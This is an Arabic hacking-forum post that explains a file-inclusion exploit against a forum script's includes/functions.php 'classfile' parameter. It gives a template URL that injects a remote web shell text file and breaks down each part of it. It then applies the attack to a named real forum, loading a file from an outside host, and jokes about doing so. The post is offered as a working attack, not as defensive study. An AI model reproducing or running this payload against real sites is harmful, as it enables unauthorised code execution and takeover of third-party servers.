[align=center]شكرا لك على الثغرة بارك الله فيك بلنسبة الاخوان هاكر مغربي & hacker's king
الاستغلال مايراد لة شرح طويل فهوا بسيط جدا راح اطبق على الاستغلال الثاني ولاستغلال الاول اخي غلط لانك ماواضع المتغير المصاب بعد علامة الاستفهام يرجى اعادة كتابة الاستغلال
الاستغلال الثاني : هو استغلال لثغرة الفايل انكود lfi
كود PHP:
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?
http//www.site.com<<< الموقع المستهدف
[path]<<< المجلد الموجد فية المنتدى
includes/functions.php<<<مسار الملف المصاب
?<<<اشارة الاستفهام التي تكون قبل المتغير المصاب
classfile<<< المتغير المصاب
[shell].txt?<<<رابط الشل بصيغة txt وبعدة علامة الاستفهام
وراح اطبق لكم على المنتدى العناكب ههههه الاستغلال
كود PHP:
www.vbspiders.com/vb/includes/functions.php?classfile=http://www.e-linux-solutions.com/descargas/data.txt?
اتمنى ان تكونوا فهمت الاستغلال
تحياتي لكم [/align]